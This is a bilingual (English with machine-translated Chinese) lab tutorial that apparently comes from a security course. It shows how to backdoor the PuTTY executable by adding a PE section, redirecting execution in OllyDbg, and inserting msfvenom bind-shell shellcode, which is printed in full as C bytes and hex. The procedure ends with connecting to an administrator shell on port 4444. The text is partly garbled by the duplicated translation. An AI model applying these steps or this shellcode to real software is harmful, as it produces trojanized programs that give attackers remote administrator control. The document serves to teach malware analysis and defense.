https://samsclass.info/127/proj/lordpe.zip https://samsclass.info/127/proj/lordpe.zip
Launch LordPE.发射LordPE。
LordPE opens, as shown below. LordPE打开,如下所示。 In this view, it shows currently running processes.在此视图中,它显示当前正在运行的进程。
In the Open box, navigate to puttybad.exe and double-click it.在“打开”框中,导航到puttybad.exe并双击它。
A "PE Editor" box opens, showing general information about putty, as shown below.将打开“PE编辑器”框,显示有关putty的一般信息,如下所示。
In the "PE Editor" box, on the right, click the Sections button.在“PE编辑器”框的右侧,单击“ 部分”按钮。
A "Section Table" box opens, showing the four sections in the putty executable.将打开“Section Table”框,显示putty可执行文件中的四个部分。
Right-click one of the sections and click " add section header ", as shown below.右键单击其中一个部分,然后单击“ 添加部分标题 ”,如下所示。
A new section named "NewSec" appears.出现名为“NewSec”的新部分。 Currently, this section has "VSize" and "RSize" values of 0, as shown below.目前,此部分的“VSize”和“RSize”值为0,如下所示。
In the "Section Table" box, right-click NewSec and click " edit section header ".在“Section Table”框中,右键单击NewSec ,然后单击“ edit section header ”。
In the "[Edit SectionHeader]" window, change the VirtualSize and RawSize to 00001000 as shown below.在“[Edit SectionHeader]”窗口中,将VirtualSize和RawSize更改为00001000 ,如下所示。
In the "[Edit SectionHeader]" window, at the bottom, in the "Flags" row, click the square button labelled ... .在“[Edit SectionHeader]”窗口的底部,在“Flags”行中,单击标有...的方形按钮。
Note the top three check boxes here: this segment is Executable, Readable, and Writeable.请注意这里的前三个复选框:此段是可执行,可读和可写。 That's good;非常好; we can place any type of code we want to here, even self-modifying code.我们可以在这里放置我们想要的任何类型的代码,甚至是自修改代码。
Click OK .单击确定 。
Click OK .单击确定 。
Close the "Section Table" box.关闭“Section Table”框。
In the "PE Editor" box, click the Save button.在“PE编辑器”框中,单击“ 保存”按钮。
In the "PE Editor" box, click the OK button.在“PE编辑器”框中,单击“ 确定”按钮。
Close the LordPE window.关闭LordPE窗口。
In Ollydbg, from the menu bar, click File , Open .在Ollydbg中,从菜单栏中单击“ 文件” ,“ 打开” 。 Navigate to puttybad.exe and open it.导航到puttybad.exe并将其打开。
From the Ollydbg menu bar, click View , Memory .从Ollydbg菜单栏中,单击“ 查看” ,“ 内存” 。
Ollydbg shows the memory layout of putty. Ollydbg显示了putty的内存布局。 As highlighted in the image below, the "NewSec" section begins at address 484000 .如下图所示,“NewSec”部分从地址484000开始。
In the "Memory map" window, double-click NewSec .在“内存映射”窗口中,双击“ NewSec” 。
A "Dump" window opens, showing the data stored in NewSec, as shown below.将打开“转储”窗口,显示存储在NewSec中的数据,如下所示。
This is a digital signature, added to recent downloads of Putty.这是一个数字签名,添加到最近下载的Putty。 Notice the readable text in the lower portion of this window, on the right side, saying "AddTrust External CA Root".请注意此窗口下部的可读文本,在右侧,显示“AddTrust External CA Root”。
The digital signature is a good way to verify file integrity, but it's not essential for file execution, so we can overwrite it.数字签名是验证文件完整性的好方法,但它对于文件执行并不重要,因此我们可以覆盖它。
Close the Dump window.关闭转储窗口。 Close the "Memory map" window.关闭“内存映射”窗口。
In the top left pane of the CPU window, right-click, and click " Go to ", Expression .在CPU窗口的左上方窗格中,单击鼠标右键,然后单击“ 转到 ”, 表达式 。
In the "Enter expression to follow" box, enter 41CB6E在“输入要跟随的表达式”框中,输入41CB6E
Click OK .单击确定 。
Ollydbg moves to show the PUSH instruction that loads the "login as: " string, as shown below. Ollydbg移动以显示加载“login as:”字符串的PUSH指令,如下所示。
Right-click the PUSH instruction and click Assemble , as shown below.右键单击PUSH指令,然后单击Assemble ,如下所示。
In the "Assemble" box, enter this command, as shown below:在“Assemble”框中,输入此命令,如下所示:
JMP 484000
Click the Assemble button.单击“ 装配”按钮。
Click the Cancel button.单击“ 取消”按钮。
The MOV instruction has been replaced by this instruction, as shown below: MOV指令已被此指令替换,如下所示:
JMP putty-ne.00484000
In the JMP insruction, right-click 00484000 .在JMP insruction中,右键单击00484000 。 and click Follow .然后单击“ 关注”
Ollydbg moves to address 00484000. Ollydbg移至地址00484000。
Right-click 00484000 and click Assemble .右键单击00484000 ,然后单击“ 装配” 。 Enter this command, as shown below.输入此命令,如下所示。
INT3
Click Assemble .单击“ 装配” 。 Click Cancel .单击取消 。
Address 484000 now contains an INT3 instruction, which is CC in hexadecimal, As shown below.地址484000现在包含一个INT3指令,它是十六进制的CC,如下所示。
Putty opens.腻子打开了。 In the "Host Name (or IP address)" box, type在“主机名(或IP地址)”框中,键入
ad.samsclass.info
At the bottom, click the Open button.在底部,单击“ 打开”按钮。 The program stops, and the status bar in the lower left corner of the Ollydbg window says " INT3 command at putty-ne.00404000 ", as outlined in green in the image below.程序停止,Ollydbg窗口左下角的状态栏显示“ putty-ne.00404000处的INT3命令 ”,如下图中的绿色所示。
This shows that the code redirection worked, and executed the first instruction in the .NewSec section!这表明代码重定向工作,并执行.NewSec部分中的第一条指令!
In Ollydbg, in the top left pane of the CPU window, right-click, and click " Go to ", Expression .在Ollydbg中,在CPU窗口的左上方窗格中,单击鼠标右键,然后单击“ 转到 ”, 表达式 。
In the "Enter expression to follow" box, verify that 41CB6E is entered.在“输入要跟随的表达式”框中,验证是否输入了41CB6E 。 Click OK .单击确定 。
In Ollydbg, in the top left pane of the CPU windows, right-click, point to " Copy to Executable ", and click " All modifications ", as shown below.在Ollydbg中,在CPU窗口的左上窗格中,右键单击,指向“ 复制到可执行文件 ”,然后单击“ 所有修改 ”,如下所示。
A "Copy selection to executable file" box pops up.弹出“复制选择到可执行文件”框。 Click the " Copy all " button.单击“ 全部复制 ”按钮。
A new window pops up, with a title ending in "puttybad.exe".弹出一个新窗口,标题以“puttybad.exe”结尾。
Right-click in the new window and click " Save file ".在新窗口中单击鼠标右键,然后单击“ 保存文件 ”。
Save the file as " puttybad2.exe ".将文件另存为“ puttybad2.exe ”。
Close Ollydbg.关闭Ollydbg。
You can generate shellcode with msfvenom, on Kali.您可以在Kali上使用msfvenom生成shellcode。 Here's what I got when I did it:这是我做的时候得到的:
Here's the shellcode, reformatted and broken into two sections.这是shellcode,重新格式化并分为两部分。root@kali:~/Cminer# msfvenom -p windows/shell_bind_tcp -fc root @ kali:〜/ Cminer#msfvenom -p windows / shell_bind_tcp -fc No platform was selected, choosing Msf::Module::Platform::Windows from the payload没有选择平台,从有效负载中选择Msf :: Module :: Platform :: Windows No Arch selected, selecting Arch: x86 from the payload选择No Arch,从有效负载中选择Arch:x86 No encoder or badchars specified, outputting raw payload未指定编码器或badchars,输出原始有效负载 Payload size: 328 bytes有效载荷大小:328字节 unsigned char buf[] = unsigned char buf [] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" “\ XFC \ xe8 \ X82 \ X00 \ X00 \ X00 \ X60 \ X89 \ xe5 \ X31 \ XC0 \ 64 \ x8b \ X50 \ X30” "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" “\ x8b \ X52 \ X0C \ x8b \ X52 \ X14 \ x8b \ X72 \ X28 \ X0F \ XB7 \ X4A \ X26 \ X31 \ XFF” "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" “\西飞\ X3C \ X61 \ X7C \ X02 \ X2C \ X20 \ XC 1 \ XCF \ X0D \ X01 \ xc7 \ XE2 \ XF2 \ X52” "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" “\ X57 \ x8b \ X52 \ X10 \ x8b \ X4A \ X3C \ x8b \ x4c \ X11 \ X78 \ XE3 \ X48 \ X01 \ XD1” "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" “\ X51 \ x8b \ X59 \ X20 \ X01 \ XD3 \ x8b \ X49 \ X18 \ XE3 \ X3A \ X49 \ x8b \ X34 \ x8b” "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" “\ X01 \ XD6 \ X31 \ XFF \西飞\ XC 1 \ XCF \ X0D \ X01 \ xc7 \ X38 \ xe0 \ X75 \ XF6 \ X03” "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" “\ x7d \ XF8 \ X3B \ x7d \ X24 \ X75 \ XE4 \ X58 \ x8b \ X58 \ X24 \ X01 \ XD3 \ X66 \ x8b” "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" “\ X0C \ X4B \ x8b \ X58 \ X1C \ X01 \ XD3 \ x8b \ X04 \ x8b \ X01 \ XD0 \ X89 \ X44 \ X24” "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" “\ X24 \ x5b \ x5b \ X61 \ X59 \ X5A \ X51 \ XFF \ xe0 \ X5F \ X5F \ X5A \ x8b \ X12 \ XEB” "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" “\ x8d \ X5D \ X68 \ X33 \ X32 \ X00 \ X00 \ X68 \ X77 \ X73 \ X32 \ X5F \ X54 \ X68 \ x4c” "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" “\ X77 \ X26 \ X07 \ XFF \ XD5 \ XB8 \ X90 \ X01 \ X00 \ X00 \ X29 \ XC4 \ X54 \ X50 \ X68” "\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40" “\ X29 \ X80 \ X6B \ X00 \ XFF \ XD5 \ X6A \ X08 \ X59 \ X50 \ XE2 \ xfd的\ X40 \ X50 \ X40” "\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89" “\ X50 \ X68 \ XEA \ X0F \ XDF \ xe0 \ XFF \ XD5 \ X97 \ X68 \ X02 \ X00 \ X11 \ x5c \ X89” "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" “\ XE6 \ X6A \ X10 \ X56 \ X57 \ X68 \ XC2 \ XDB \ X37 \ X67 \ XFF \ XD5 \ X57 \ X68 \ XB7” "\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97" “\ xe9 \ X38 \ XFF \ XFF \ XD5 \ X57 \ X68 \ X74 \ XEC \ X3B \ XE1 \ XFF \ XD5 \ X57 \ X97” "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57" “\ X68 \ X75 \ x6e \ x4d \ X61 \ XFF \ XD5 \ X68 \ X63 \ X6D \ 64 \ X00 \ X89 \ XE3 \ X57” "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" “\ X57 \ X57 \ X31 \ XF6 \ X6A \ X12 \ X59 \ X56 \ XE2 \ xfd的\ X66 \ xc7 \ X44 \ X24 \ X3C” "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" “\ X01 \ X01 \ x8d \ X44 \ X24 \ X10 \ XC6 \ X00 \ X44 \ X54 \ X50 \ X56 \ X56 \ X56 \ X46” "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0" “\ X56 \ x4e \ X56 \ X56 \ X53 \ X56 \ X68 \ X79 \ XCC \ X3F \ 86 \ XFF \ XD5 \ X89 \ xe0” "\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5" “\ x4e \ X56 \ X46 \ XFF \ X30 \ X68 \ X08 \的x87 \ X1D \ X60 \ XFF \ XD5 \ XBB \ XF0 \ XB5” "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb" “\ XA2 \ X56 \ X68 \ xa6 \ X95 \ XBD \ x9d \ XFF \ XD5 \ X3C \ X06 \ X7C \ X0A \ X80 \ XFB” "\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"; “\ xe0 \ X75 \ X05 \ XBB \ X47 \ X13 \ X72 \ x6f \ X6A \ X00 \ X53 \ XFF \ XD5”;
fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f2 52 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f2 52 57 8b 52 10 8b 4a 3c 8b 4c 11 78 e3 48 01 d1 57 8b 52 10 8b 4a 3c 8b 4c 11 78 e3 48 01 d1 51 8b 59 20 01 d3 8b 49 18 e3 3a 49 8b 34 8b 51 8b 59 20 01 d3 8b 49 18 e3 3a 49 8b 34 8b 01 d6 31 ff ac c1 cf 0d 01 c7 38 e0 75 f6 03 01 d6 31 ff ac c1 cf 0d 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b 58 24 01 d3 66 8b 7d f8 3b 7d 24 75 e4 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f 5a 8b 12 eb 24 5b 5b 61 59 5a 51 ff e0 5f 5f 5a 8b 12 eb 8d 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 8d 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68
29 80 6b 00 ff d5 6a 08 59 50 e2 fd 40 50 40 29 80 6b 00 ff d5 6a 08 59 50 e2 fd 40 50 40 50 68 ea 0f df e0 ff d5 97 68 02 00 11 5c 89 50 68 ea 0f df e0 ff d5 97 68 02 00 11 5c 89 e6 6a 10 56 57 68 c2 db 37 67 ff d5 57 68 b7 e6 6a 10 56 57 68 c2 db 37 67 ff d5 57 68 b7 e9 38 ff ff d5 57 68 74 ec 3b e1 ff d5 57 97 e9 38 ff ff d5 57 68 74 ec 3b e1 ff d5 57 97 68 75 6e 4d 61 ff d5 68 63 6d 64 00 89 e3 57 68 75 6e 4d 61 ff d5 68 63 6d 64 00 89 e3 57 57 57 31 f6 6a 12 59 56 e2 fd 66 c7 44 24 3c 57 57 31 f6 6a 12 59 56 e2 fd 66 c7 44 24 3c 01 01 8d 44 24 10 c6 00 44 54 50 56 56 56 46 01 01 8d 44 24 10 c6 00 44 54 50 56 56 56 46 56 4e 56 56 53 56 68 79 cc 3f 86 ff d5 89 e0 56 4e 56 56 53 56 68 79 cc 3f 86 ff d5 89 e0 4e 56 46 ff 30 68 08 87 1d 60 ff d5 bb f0 b5 4e 56 46 ff 30 68 08 87 1d 60 ff d5 bb f0 b5 a2 56 68 a6 95 bd 9d ff d5 3c 06 7c 0a 80 fb a2 56 68 a6 95 bd 9d ff d5 3c 06 7c 0a 80 fb e0 75 05 bb 47 13 72 6f 6a 00 53 ff d5 e0 75 05 bb 47 13 72 6f 6a 00 53 ff d5
Scroll to address 00080000. After a region filled with zeroes, it starts with these bytes: "A8 1B 00", as shown below.滚动到地址00080000.在填充零的区域之后,它以这些字节开头:“A8 1B 00”,如下所示。
Above, on this Web page, highlight and copy the first set of shellcode bytes, from "fc" through "68".在上面的这个网页上,突出显示并复制第一组shellcode字节,从“fc”到“68”。
In HxD, right-click the byte at address 00080000 and click " Paste write ", as shown below.在HxD中,右键单击地址00080000处的字节,然后单击“ 粘贴写入 ”,如下所示。
The first portion of the shellcode appears in red text, as shown below. shellcode的第一部分以红色文本显示,如下所示。
Above, on this Web page, highlight and copy the first set of shellcode bytes, from "29" through "d5".在上面的网页上,突出显示并复制第一组shellcode字节,从“29”到“d5”。
In HxD, right-click the byte at address 000800A5 and click " Paste write ".在HxD中,右键单击地址000800A5处的字节,然后单击“ 粘贴写入 ”。 Your screen should look like the image below.您的屏幕应如下图所示。
In HxD, click File , Save .在HxD中,单击“ 文件” ,“ 保存” 。 Close HxD.关闭HxD。
Putty opens.腻子打开了。 In the "Host Name (or IP address)" box, type在“主机名(或IP地址)”框中,键入
ad.samsclass.info
At the bottom, click the Open button.在底部,单击“ 打开”按钮。 A black Putty window opens, but remains blank, as shown below.黑色Putty窗口打开,但仍为空白,如下所示。
This is because we were sloppy when inserting shellcode, and broke the normal operation of Putty.这是因为我们在插入shellcode时很草率,并打破了Putty的正常运行。
Open a Command Prompt and execute this command:打开命令提示符并执行以下命令:
netstat -an | findstr 4444
You should see port 4444 LISTENING, as shown below.您应该看到端口4444 LISTENING,如下所示。 telnet 127.0.0.1 4444
A Command Prompt opens, allowing you to execute commands on the server, as shown below.将打开命令提示符,允许您在服务器上执行命令,如下所示。 Execute this command:执行以下命令:
whoami
You are the local administrator, as shown below, and so is anyone else who connects to this machine on port 4444.您是本地管理员,如下所示,在端口4444上连接到此计算机的任何其他人也是如此。 The CRC32 is the hash, like this: 07b01710
CRC32是哈希值,如下所示: 07b01710